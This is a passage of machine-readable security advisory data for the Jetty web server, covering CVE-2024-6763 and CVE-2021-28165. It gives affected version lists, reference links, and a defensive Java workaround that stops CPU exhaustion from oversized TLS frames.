"8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", 
"9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.53.v20231009", "9.4.54.v20240208", "9.4.55.v20240627", "9.4.56.v20240826", "9.4.57.v20241219", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 12.0.11", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-qh8g-58pp-2wxh/GHSA-qh8g-58pp-2wxh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-qh8g-58pp-2wxh" }, { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2024-6763" }, { "type": "WEB", "url": "https://github.com/jetty/jetty.project/pull/12012" }, { "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/25" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250306-0005" } ], "database_specific": { "cwe_ids": [ "CWE-1286" ], "github_reviewed": true, "github_reviewed_at": "2024-10-14T21:11:43Z", "nvd_published_at": "2024-10-14T16:15:04Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-26vr-8j45-3r4w", "published": "2021-04-06T17:31:30Z", "modified": "2024-03-11T05:36:57.484846Z", "aliases": [ "BIT-jenkins-2021-28165", "CVE-2021-28165" ], "related": [ "CVE-2021-28165" ], "summary": "Jetty vulnerable to incorrect handling of invalid large TLS frame, exhausting CPU resources", "details": "### Impact\nWhen using SSL/TLS with Jetty, either with HTTP/1.1, HTTP/2, or WebSocket, the server may receive an invalid large (greater than 17408) TLS frame that is incorrectly handled, causing CPU resources to eventually reach 100% usage.\n\n### Workarounds\n\nThe problem can be worked around by compiling the following class:\n```java\npackage org.eclipse.jetty.server.ssl.fix6072;\n\nimport java.nio.ByteBuffer;\nimport javax.net.ssl.SSLEngine;\nimport javax.net.ssl.SSLEngineResult;\nimport javax.net.ssl.SSLException;\nimport javax.net.ssl.SSLHandshakeException;\n\nimport org.eclipse.jetty.io.EndPoint;\nimport org.eclipse.jetty.io.ssl.SslConnection;\nimport org.eclipse.jetty.server.Connector;\nimport org.eclipse.jetty.server.SslConnectionFactory;\nimport org.eclipse.jetty.util.BufferUtil;\nimport org.eclipse.jetty.util.annotation.Name;\nimport 
org.eclipse.jetty.util.ssl.SslContextFactory;\n\npublic class SpaceCheckingSslConnectionFactory extends SslConnectionFactory\n{\n public SpaceCheckingSslConnectionFactory(@Name(\"sslContextFactory\") SslContextFactory factory, @Name(\"next\") String nextProtocol)\n {\n super(factory, nextProtocol);\n }\n\n @Override\n protected SslConnection newSslConnection(Connector connector, EndPoint endPoint, SSLEngine engine)\n {\n return new SslConnection(connector.getByteBufferPool(), connector.getExecutor(), endPoint, engine, isDirectBuffersForEncryption(), isDirectBuffersForDecryption())\n {\n @Override\n protected SSLEngineResult unwrap(SSLEngine sslEngine, ByteBuffer input, ByteBuffer output) throws SSLException\n {\n SSLEngineResult results = super.unwrap(sslEngine, input, output);\n\n if ((results.getStatus() == SSLEngineResult.Status.BUFFER_UNDERFLOW ||\n results.getStatus() == SSLEngineResult.Status.OK \u0026\u0026 results.bytesConsumed() == 0 \u0026\u0026 results.bytesProduced() == 0) \u0026\u0026\n BufferUtil.space(input) == 0)\n {\n BufferUtil.clear(input);\n throw new SSLHandshakeException(\"Encrypted buffer max length exceeded\");\n }\n return results;\n }\n };\n }\n}\n```\nThis class can be deployed by:\n + The resulting class file should be put into a jar file (eg sslfix6072.jar)\n + The jar file should be made available to the server. 
For a normal distribution this can be done by putting the file into ${jetty.base}/lib\n + Copy the file `${jetty.home}/modules/ssl.mod` to `${jetty.base}/modules`\n + Edit the `${jetty.base}/modules/ssl.mod` file to have the following section:\n\n```\n[lib]\nlib/sslfix6072.jar\n```\n\n+ Copy the file `${jetty.home}/etc/jetty-https.xml` and `${jetty.home}/etc/jetty-http2.xml` to `${jetty.base}/etc`\n+ Edit files `${jetty.base}/etc/jetty-https.xml` and `${jetty.base}/etc/jetty-http2.xml`, changing any reference of `org.eclipse.jetty.server.SslConnectionFactory` to `org.eclipse.jetty.server.ssl.fix6072.SpaceCheckingSslConnectionFactory`. For example:\n```xml\n \u003cCall name=\"addIfAbsentConnectionFactory\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.server.ssl.fix6072.SpaceCheckingSslConnectionFactory\"\u003e\n \u003cArg name=\"next\"\u003ehttp/1.1\u003c/Arg\u003e\n \u003cArg name=\"sslContextFactory\"\u003e\u003cRef refid=\"sslContextFactory\"/\u003e\u003c/Arg\u003e\n \u003c/New\u003e\n \u003c/Arg\u003e\n \u003c/Call\u003e\n```\n+ Restart Jetty", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.2.2" }, { "fixed": "9.4.39" } ] } ], "versions": [ "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", 
"7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", 
"9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-26vr-8j45-3r4w/GHSA-26vr-8j45-3r4w.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0.0", "10.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-26vr-8j45-3r4w/GHSA-26vr-8j45-3r4w.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-26vr-8j45-3r4w/GHSA-26vr-8j45-3r4w.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-26vr-8j45-3r4w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28165" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc907ed7b089828364437de5ed57fa062330970dc1bc5cd214b711f77@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc6c43c3180c0efe00497c73dd374cd34b62036cb67987ad42c1f2dce@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4dbc9907b0bdd634200ac90a15283d9c143c11af66e7ec72128d020@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4779abc1cface47e956cf9f8910f15d79c24477e7b1ac9be076a825@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbd9a837a18ca57ac0d9b4165a6eec95ee132f55d025666fe41099f33@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbcd7b477df55857bb6cae21fcc4404683ac98aac1a47551f0dc55486@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbba0b02a3287e34af328070dd58f7828612f96e2e64992137f4dc63d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbab9e67ec97591d063905bc7d4743e6a673f1bc457975fc0445ac97f@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8f5a6ded384eb00608e6137e87110e7dd7d5054cc34561cb89b81af@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb66ed0b4bb74836add60dd5ddf9172016380b2aeefb7f96fe348537b@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2d34abb67cdf525945fe4b821c5cdbca29a78d586ae1f9f505a311c@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1624b9777a3070135e94331a428c6653a6a1edccd56fa9fb7a547f2@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb11a13e623218c70b9f2a2d0d122fdaaf905e04a2edcd23761894464@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb00345f6b1620b553d2cc1acaf3017aa75cea3776b911e024fa3b187@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raea6e820644e8c5a577f77d4e2044f8ab52183c2536b00c56738beef@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rae8bbc5a516f3e21b8a55e61ff6ad0ced03bdbd116d2170a3eed9f5c@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9dd15ba8a4fb7e42c7fe948a6d6b3868fd6bbf8e3fb37fcf33b2cd0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra50519652b0b7f869a14fbfb4be9758a29171d7fe561bb7e036e8449@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra21b3e6bd9669377139fe33fb46edf6fece3f31375bc42a0dcc964b2@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra210e38ae0bf615084390b26ba01bb5d66c0a76f232277446ae0948a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9fae5a4087d9ed1c9d4f0c7493b6981a4741cfb4bebb2416da638424@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9db72e9c33b93eba45a214af588f1d553839b5c3080fc913854a49ab@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b793db9f395b546e66fb9c44fe1cd75c7755029e944dfee31b8b779@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4abbd760d24bab2b8f1294c5c9216ae915100099c4391ad64e9ae38b@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210611-0006" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rfd3ff6e66b6bbcfb2fefa9f5a20328937c0369b2e142e3e1c6774743@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc9f51b4e21022b3cd6cb6f90791a6a6999560212e519b5f09db0aed@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf99f9a25ca24fe519c9346388f61b5b3a09be31b800bf37f01473ad7@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6de4c249bd74007f5f66f683c110535f46e719d2f83a41e8faf295f@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1b02dfccd27b8bbc3afd119b212452fa32e9ed7d506be9357a3a7ec@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree1895a256a9db951e0d97a76222909c2e1f28c1a3d89933173deed6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re6614b4fe7dbb945409daadb9e1cc73c02383df68bf9334736107a6e@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re577736ca7da51952c910b345a500b7676ea9931c9b19709b87f292b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3a1617d16a7367f767b8209b2151f4c19958196354b39568c532f26@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0545ecced2d468c94ce4dcfa37d40a9573cc68ef5f6839ffca9c1c1@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdfe5f1c071ba9dadba18d7fb0ff13ea6ecb33da624250c559999eaeb@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf4fe435891e8c35e70ea5da033b4c3da78760f15a8c4212fad89d9f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rdde34d53aa80193cda016272d61e6749f8a9044ccb37a30768938f7e@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbf2a2cd1800540ae50dd78b57411229223a6172117d62b8e57596aa@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd9ea411a58925cc82c32e15f541ead23cb25b4b2d57a2bdb0341536e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd755dfe5f658c42704540ad7950cebd136739089c3231658e398cf38@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd6c1eb9a8a94b3ac8a525d74d792924e8469f201b77e1afcf774e7a6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd24d8a059233167b4a5aebda4b3534ca1d86caa8a85b10a73403ee97@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdea97f4d3233298296aabc103c9fcefbf629425418c2b69bb16745f@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4891d45625cc522fe0eb764ac50d48bcca9c0db4805ea4a998d4c225@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47a7542ab61da865fff3db0fe74bfe76c89a37b6e6d2c2a423f8baee@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r411d75dc6bcefadaaea246549dd18e8d391a880ddf28a796f09ce152@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/r401b1c592f295b811608010a70792b11c91885b72af9f9410cffbe35@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r40136c2010fccf4fb2818a965e5d7ecca470e5f525c232ec5b8eb83a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33eb3889ca0aa12720355e64fc2f8f1e8c0c28a4d55b3b4b8891becb@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31f591a0deac927ede8ccc3eac4bb92697ee2361bf01549f9e3440ca@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2d9c3b7cc750a6763d6388bcf5db0c7b467bd8be6ac4d6aea4f0cf@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2afc72af069a7fe89ca2de847f3ab3971cb1d668a9497c999946cd78@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r23785214d47673b811ef119ca3a40f729801865ea1e891572d15faa6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17e26cf9a1e3cbc09522d15ece5d7c7a00cdced7641b92a22a783287@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f02034a33076fd7243cf3a8807d2766e373f5cb2e7fd0c9a78f97c4@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0cd1a5e3f4ad4770b44f8aa96572fc09d5b35bec149c0cc247579c42@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0bf3aa065abd23960fc8bdc8090d6bc00d5e391cf94ec4e1f4537ae3@%3Cjira.kafka.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r0a4797ba6ceea8074f47574a4f3cc11493d514c1fab8203ebd212add@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a241b0649beef90d422b42a26a2470d336e59e66970eafd54f9c3e2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r077b76cafb61520c14c87c4fc76419ed664002da0ddac5ad851ae7e7@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06d54a297cb8217c66e5190912a955fb870ba47da164002bf2baffe5@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 